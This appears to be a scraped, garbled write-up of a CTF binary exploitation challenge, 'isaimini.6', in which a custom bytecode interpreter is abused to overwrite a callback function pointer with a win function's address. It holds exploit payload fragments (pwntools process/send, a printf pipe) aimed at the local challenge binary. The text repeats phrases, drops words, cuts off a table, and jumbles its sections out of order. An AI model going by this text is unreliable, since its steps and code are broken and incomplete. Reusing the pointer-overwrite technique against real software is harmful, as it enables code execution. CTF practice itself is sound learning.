Isaimini.6 May 2026

Category : Reverse Engineering / Binary Exploitation Difficulty : Medium – Hard (depending on your familiarity with custom byte‑code interpreters) Points : 425 (CTF‑2024) 1. Challenge Overview The challenge provides a single 64‑bit ELF binary called isaimini.6 and a small text file named input.txt (optional). The binary is an interpreter for a tiny “ISA‑mini” instruction set (the name comes from the challenge author’s earlier “isa‑mini” series).

# Instead of assembling, we manually encode: payload = b"\x01\x01" + p64(win_addr) # MOV r1, win payload += b"\x05\x10\x01" # ST [r16], r1 (write win → callback) payload += b"\x09" # HLT

The program reads a user‑supplied string (up to 256 bytes) from , parses it as a sequence of ISA‑mini instructions, executes them, and finally prints either Success! or Failure! . isaimini.6

There is to win from the interpreter – it is only reachable via a function pointer stored in the global variable callback . The pointer is used after the instruction loop finishes:

# Send payload p = process(binary) p.send(payload) print(p.recvall().decode()) Running this script prints the flag (or “Success!”). | Technique | Why it mattered | |-----------|-----------------| | Static analysis of a stripped binary | Ghidra’s decompiler can # Instead of assembling, we manually encode: payload

# Send the payload via stdin printf "$payload" | ./isaimini.6 :

binary = "./isaimini.6" elf = ELF(binary) There is to win from the interpreter –

parse_input tokenises the input and stores each instruction as a struct in a global array insts[128] . execute iterates over insts and dispatches to the appropriate handler based on the first byte (the opcode). The interpreter keeps a register file :